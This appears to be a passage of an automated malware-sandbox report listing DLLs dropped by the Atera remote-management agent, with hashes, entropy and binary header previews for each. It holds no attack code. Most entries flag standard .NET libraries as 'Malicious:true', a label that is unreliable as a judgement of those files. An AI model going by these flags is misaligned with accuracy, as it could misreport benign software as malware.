                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16424
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.821922609942847
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:3nhp+J2sx/5W6eW5lPENyby2sE9jBF6IYiYF85S35IVnxGUHF9IAcFnDp:X6RW6eWX8Nyb8E9VF6IYijSJIVxiA+nN
                                                                                                                                                                                                                                                                                                                                  MD5:9867AF19892EC63E2735D0586CB1BB32
                                                                                                                                                                                                                                                                                                                                  SHA1:1F06306C944A59C3CFFC02D98F23798887AB58F4
                                                                                                                                                                                                                                                                                                                                  SHA-256:99F43E4DE804DC60719CA95B2A8D8F72ACD9C373CA69FB9E373539DE004D59FA
                                                                                                                                                                                                                                                                                                                                  SHA-512:63760414A51DC0CBDAEA59796315480244ACB29409A731310EDB4B0608BDD45179A6DB8072F73BC229EDE9C0471455F823BA6C3584FF5AD20D01DC77C63FD7A0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............-... ...@....... ..............................?.....@..................................-..O....@..................((...`......P,............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................-......H.......P .......................+......................................BSJB............v4.0.30319......l.......#~..\.......#Strings....\.......#US.`.......#GUID...p.......#Blob......................3......................................5.........c.............z...............(.....E.....................................Q.........../...........b.....b.....b...).b...1.b...9.b...A.b...I.b...Q.b...Y.b...a.b...i.b...q.b.......................#.....+.....3.....;.....C.4...K.T...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.Parallel.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.853203582617837
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:ZSUP9W70WxhNyb8E9VF6IYijSJIVxu11S/l:gUe/lEpYi6006l
                                                                                                                                                                                                                                                                                                                                  MD5:56FA4FE3BF2B273E00522905B3799A3C
                                                                                                                                                                                                                                                                                                                                  SHA1:A16628F9E9449B16E7D5FF5C87A065161EB51C7C
                                                                                                                                                                                                                                                                                                                                  SHA-256:986451206E760FC7F0EB5232A8F01529DA1C9F534922A0324BBB8B79CEAA3F1A
                                                                                                                                                                                                                                                                                                                                  SHA-512:A628B5F90E28D1A8FF15E9182E38EAB613889952EA431D02364D933C207660D14EDC6E765C03C4E0ECB2C782EDA22995B9B67CA76ECD7F2C0EBCC0669E79C758
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............)... ...@....... ...................................@..................................(..O....@..................((...`.......'............................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P .......................'......................................BSJB............v4.0.30319......l.......#~..,...x...#Strings............#US.........#GUID...........#Blob......................3..................................................&.....&...p.....F.............................9.....R.................m.....V...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.1...K.Q...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.Queryable.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.851168312584129
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:e8yg07W0/WtTNyb8E9VF6IYijSJIVx/o3MW:eBHEPEpYi60AV
                                                                                                                                                                                                                                                                                                                                  MD5:293C6523C19B456CB6274E4D940A65FD
                                                                                                                                                                                                                                                                                                                                  SHA1:B4AD49F6ED659748CB62DB014E8042ECC0D5C3A3
                                                                                                                                                                                                                                                                                                                                  SHA-256:3D9A94CCFFA200B989CD1E73E48685D3C866C8A3872FFADFB61C0AB7F1D27E28
                                                                                                                                                                                                                                                                                                                                  SHA-512:F2270410224C729055006CDF703004F5685A1695EBB692D35D9822AE3DB4907295255828AD1EEB9C6ACCCB7400217849543736CFB5F876B9712028AF9E113484
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............)... ...@....... ....................................@..................................(..O....@..................((...`......x'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~.. ...d...#Strings............#US.........#GUID...........#Blob......................3.................................................."....."...m.....B.............................6.....O.................j.....S.......(...........................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.2...K.R...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.816344691451213
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:cueAxQJ4WmRW5WPtNyby2sE9jBF6IYiYF85S35IVnxGUHFONIgMk:Se1WmRWgFNyb8E9VF6IYijSJIVxaqgN
                                                                                                                                                                                                                                                                                                                                  MD5:AEF19D2432A273888E3FC230B1EEA4E5
                                                                                                                                                                                                                                                                                                                                  SHA1:E2343DFA8BFB6639E92909639C030CF2101F3959
                                                                                                                                                                                                                                                                                                                                  SHA-256:1B20938ADBD20304728313BA716F840E7C0763BF177AF8BD0C8340E403494070
                                                                                                                                                                                                                                                                                                                                  SHA-512:B5E09F3AB7515C3BFB9256F7984AC2EA58FA48930327BE89869A4EB163AD44BBFC1F8E2425371EB198F4DD6CE6481D787B21EF43E14FEA5569A280F2E942FC1C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ....................................@.................................p(..O....@..................((...`......8'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P ..h....................&......................................BSJB............v4.0.30319......l.......#~.. ...0...#Strings....P.......#US.T.......#GUID...d.......#Blob......................3............................................................f...........z.................y...../.....H.................c.....L.......,...........................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.(...K.H...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Memory.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):142376
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.16079949765909
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:qUGrszKKLBFa9DvrJGeesIf3afNs2AldfIlqb:dBFd3/aFs22
                                                                                                                                                                                                                                                                                                                                  MD5:FBE66819EB3D9C2BF13220AED61ECA02
                                                                                                                                                                                                                                                                                                                                  SHA1:5D8B33F6102F7E4441CD53C7CB6FD69CA86E6F89
                                                                                                                                                                                                                                                                                                                                  SHA-256:7B61FF3A55C9915891EDC5E54020C6007D3999E974D35FDA6C496FF801A52A3C
                                                                                                                                                                                                                                                                                                                                  SHA-512:C514043A08927CA8281C49D6C063106CDCFFC351B574A406245CBDDAD6E4BC5EF0B48CE6597E516106FB5C3EC0F1C235C00B5A3D3EEFBFA9136C661D508031BB
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0.................. ... ....... .......................`......P.....@.................................X...O.... ..0...............((...@...... ................................................ ............... ..H............text........ ...................... ..`.rsrc...0.... ......................@..@.reloc.......@......................@..B........................H........,................................................................('...*>..}......}....*..{....*..{....*..{.....{....3..{.....{....((...*.*..0...........%.u....,..........(....*.*z.{....%-.&.+.o)....{....(a...*..(....zN........o*...s+...*.(....z.s,...*..(....zF(U....(O...s-...*.(....z.(V...s-...*.(....z.s....*.(....z.s/...*..(....zN........o*...s0...*.(....zrr...p(\....c.K...(O...s1...*.(....zBr...p(Y...s1...*.(....z.s2...*.(....z.(X...s3...*.(!...z.(_...s3...*.(#...z

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Http.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):192552
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.114522555938557
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:feruQlNGOhYq0AQcTvankc+8lbKta4FUPAT8xpRI454I/Kv6RpZ8dwPSgSb2:iW60VcTvakcXcApOm
                                                                                                                                                                                                                                                                                                                                  MD5:22936FF89D87A11BBCF81C37E12AFAC6
                                                                                                                                                                                                                                                                                                                                  SHA1:533A1C7603ACC27E2CF08F897586B9D657033062
                                                                                                                                                                                                                                                                                                                                  SHA-256:EC7DE31CF9DEEF74361EC645CB3DA3DE0AB5FD53A25624BDCC0D84A2B80BCD96
                                                                                                                                                                                                                                                                                                                                  SHA-512:E3AB024862C2246F6814EA3E0E0DBAC0100A3C1F4D3545D4D1AF62AE38D1CBB4EABFA55082CF2A5C35887B883FDEE50EE37BDC16725A2564B9D12D9DF41517FD
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0.................. ........... ....................... ............@.....................................O.......h...............((........................................................... ............... ..H............text...D.... ...................... ..`.rsrc...h...........................@..@.reloc..............................@..B........................H........$..H...........$....,...........................................0..,........ ....1.r...ps0...z.............(.....s1...*.0..l........J.2..J.o2...2.r...ps0...z..Jo3....%36.o2....JY.2*..J.Xo3.....J.Xo3...(...... ........J.XT.*...J...XT.o3...*..o2....Y./..*..o3....%3 ...Xo3......Xo3...(.... .......*.*..0..=..........J...XT..%....J...XT.~..... ...._.c.....J...XT.~......._..*....0............02...91...A2...F1...a2...f1. ....*..91...F1...aY+...AY..X+...0Y...02...91...A2...F

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.NameResolution.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.83723175247609
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:V6ZWYLWBwNyb8E9VF6IYijSJIVxNNLxfR/:V6l4IEpYi60RR/
                                                                                                                                                                                                                                                                                                                                  MD5:C903E869B62A48267B98640224C9DB1F
                                                                                                                                                                                                                                                                                                                                  SHA1:EE05E7CB443DF6D566FA3373F810AD37BE31941D
                                                                                                                                                                                                                                                                                                                                  SHA-256:AC81A082833E1004B2F659B925FAC0AC64905E8EE486BF817F300BA556F19030
                                                                                                                                                                                                                                                                                                                                  SHA-512:080C463748AB4048BF33DD384F8EF9F10BE1D528FB7E90345BA92344D60FC726FF1A9E68EA139B9988FE668D8BA979034D35E74C2039E9D7B0C821C18EA20E69
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ....................................@.................................T(..O....@.. ...............((...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B.................(......H.......P ..L....................&......................................BSJB............v4.0.30319......l.......#~......0...#Strings....$.......#US.(.......#GUID...8.......#Blob......................3......................................z...............\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.6...K.V...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.NetworkInformation.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16424
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.789481214761314
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:E1W1WMQWkMNyb8E9VF6IYijSJIVxuH1+nA:n1yMEpYi60uj
                                                                                                                                                                                                                                                                                                                                  MD5:9CCFB60C5D7183D474072815F3D91A7F
                                                                                                                                                                                                                                                                                                                                  SHA1:FB5F8CC8084826367D2F5D0FA76388EA46F76AA2
                                                                                                                                                                                                                                                                                                                                  SHA-256:E0B463BE26D6EC7DAFA25E94BD9F65ED99F79DA9EF564ED58E26E363E610F856
                                                                                                                                                                                                                                                                                                                                  SHA-512:8118EF2C7F3759F6E40950D50C453985A20A5A3E4D6685509D4B148FCAEC59E59D6357A032FB302B9928A334310BC9D8888C0B05BC86B07EE63091B338A41106
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............,... ...@....... ..............................9n....@..................................,..O....@..@...............((...`......p+............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................,......H.......P .......................*......................................BSJB............v4.0.30319......l...<...#~..........#Strings....t.......#US.x.......#GUID...........#Blob......................3................................!...............E.................%.................'...........e.....~...........................................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.:...K.Z...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Ping.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.834301954407299
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:WQ/rx72WSKW5TPZNyby2sE9jBF6IYiYF85S35IVnxGUHFA/P6zt:1dSWSKW1BNyb8E9VF6IYijSJIVxs6zt
                                                                                                                                                                                                                                                                                                                                  MD5:3814B8116C13D30127539AF9E9DDF463
                                                                                                                                                                                                                                                                                                                                  SHA1:F883188A52D52C274ED9AE748EC27742D503B1AB
                                                                                                                                                                                                                                                                                                                                  SHA-256:96C763C2C9DC57EE5ECAF08B65EED3E9529F5A4C156DCEBFD910B8424B269A0B
                                                                                                                                                                                                                                                                                                                                  SHA-512:48D94D40229A4A042EE4F3074F99D69EE11F7D2487A421FEAF6062EE7A420BD1D1BF784455573710CD74A883DB418E0AF2D01E8A4117B227D3AFC9A097B1E886
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ..............................v;....@..................................(..O....@..................((...`......X'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~.. ...L...#Strings....l.......#US.p.......#GUID...........#Blob......................3......................................................\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.,...K.L...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Primitives.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16424
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.748356386203578
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:JJEYA2WkIWcqNyb8E9VF6IYijSJIVx1IZU284p:JyYA8CqEpYi60+ZPp
                                                                                                                                                                                                                                                                                                                                  MD5:D4307509DAC61017AC43A7FA55F88D8D
                                                                                                                                                                                                                                                                                                                                  SHA1:032E28F1B582F73A60FF42EB1502BA6E0BE7B452
                                                                                                                                                                                                                                                                                                                                  SHA-256:516B4D130BCF3B9C69B1FB5B1B5CA64D1EE88181718BC0C1DD7EB930BC8B43EC
                                                                                                                                                                                                                                                                                                                                  SHA-512:7D33ABB53DA47063CD4C0E5B51610E6ED53F8F8EC8E99C61C7F18A6C870F57706B7983880FB3E9D591EB2A094CF8C1B0EF1B34D4872DD2BC861FBE87216E251C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............r,... ...@....... ..............................+s....@................................. ,..O....@..................((...`.......*............................................... ............... ..H............text...x.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................T,......H.......P ......................h*......................................BSJB............v4.0.30319......l.......#~..|...x...#Strings............#US.........#GUID...........#Blob......................3......................................$.........N.U.....U.....-...u.................0...........n.........................>.......................'.....'.....'...).'...1.'...9.'...A.'...I.'...Q.'...Y.'...a.'...i.'...q.'.......................#.....+.....3.....;.....C.2...K.R...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Requests.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.87193293427259
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:8vJGWe4WTYNyb8E9VF6IYijSJIVx5Owy6Ut:CmRQEpYi60it
                                                                                                                                                                                                                                                                                                                                  MD5:364F1FA27E43FE8A665AFC2DD282E6AB
                                                                                                                                                                                                                                                                                                                                  SHA1:734F004F4B4FA0B52EFFBA62B9D8FC96FD4BEA22
                                                                                                                                                                                                                                                                                                                                  SHA-256:8D577A3DC5876852D4C4E8152D45F3E6B00D857D49966D8B7A406BC63AA32BC2
                                                                                                                                                                                                                                                                                                                                  SHA-512:5FD2D513A75149F1F38FF8CBB857467E293CB8D5A080AC7EF6BFF85C930FD7ADC094F61BDDD6236223947E5D8DD3C8A3EC33E603C16FA52E26B0F7EA0AD6F91C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............)... ...@....... ....................................@.................................0)..O....@..................((...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................d)......H.......P ..(...................x'......................................BSJB............v4.0.30319......l.......#~..d.......#Strings............#US.........#GUID...........#Blob......................3..................................................4...~.4...R.!...T.....f.................e...........4.....}...........O.....8...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.0...K.P...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Security.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15912
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.783027629507771
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:RdW1w3WesWn3Nyb8E9VF6IYijSJIVxV4D1A:O1wxd7EpYi60+q
                                                                                                                                                                                                                                                                                                                                  MD5:6A02A10DE6FD82498C24B351B75E164F
                                                                                                                                                                                                                                                                                                                                  SHA1:8270AEF156D4D9F402E2BA2137FBB7A4503D9B5E
                                                                                                                                                                                                                                                                                                                                  SHA-256:B4864C59EE501AF6041CCD66FB137057039D1F437B47364D050E516E0B5A7576
                                                                                                                                                                                                                                                                                                                                  SHA-512:933B56B82D0401CC0783E15DA2755EF2913670603D1BEE6CA235B556C370AA42F6AB57A34204A2E73FE00C31544013FC294BB98E708BFBD39AEDF813321F238D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............~*... ...@....... ...............................]....@.................................,*..O....@..................((...`.......(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................`*......H.......P ..$...................t(......................................BSJB............v4.0.30319......l...$...#~......t...#Strings............#US.........#GUID...........#Blob......................3......................................................\.....0...........D.<.....<.....<...C.<.....<.....<...[.<...x.<...-.......<.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.0...K.P...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Sockets.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):24616
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.5934938504209475
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:eylNGlfdqj5531HJTABhf8g2MkO1ICMbmiT2Y4Y3ocWS9sWvW8YsW1gNyb8E9VFk:eyp12Bhkg3qnV/srYEpYi60RWjb
                                                                                                                                                                                                                                                                                                                                  MD5:C801401B7DA2B8754A0567FFCCDCA3BD
                                                                                                                                                                                                                                                                                                                                  SHA1:24403837FF427FDCE38629D8820483F8CCBEC356
                                                                                                                                                                                                                                                                                                                                  SHA-256:7A0F72200B002F31B1C04C8CE7A94329A22364D367F6AA28EB9C53C246E72C33
                                                                                                                                                                                                                                                                                                                                  SHA-512:FE17EE8A1D1D087488F7EDC52DEB284841D54A708AC06552DA4243DF9DC5C37F20BF9936797F74C9B94ED678CB557A741BE7B87E8E543AC4949E0D762CB2313E
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..*...........I... ...`....... ..............................x.....@.................................gI..O....`...............8..((...........H............................................... ............... ..H............text....)... ...*.................. ..`.rsrc........`.......,..............@..@.reloc...............6..............@..B.................I......H.......H(... ..................HH.......................................0..J.......(....~....%-.&~..........s....%.....~....%-.&~..........s....%......o....*...0..L.......(....~....%-.&~..........s....%.....~....%-.&~..........s....%........o...+*.0..K.......(....~....%-.&~..........s....%.....~....%-.&~..........s....%.......o...+*..0..L.......(....~....%-.&~..........s....%.....~....%-.&~..........s....%........o...+*.0..L.......(....~....%-.&~..........s....%.....~....%-.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.WebHeaderCollection.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.853706532249759
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:ZSHlx2PW1bW5kPWNyby2sE9jBF6IYiYF85S35IVnxGUHFl5tc1ZiB:MHPAW1bWieNyb8E9VF6IYijSJIVxJ5oU
                                                                                                                                                                                                                                                                                                                                  MD5:EA4183E768E0C6FACC8DBC4E0BE233A8
                                                                                                                                                                                                                                                                                                                                  SHA1:412B28A105435C2F7EEA846FFF28810FEE371727
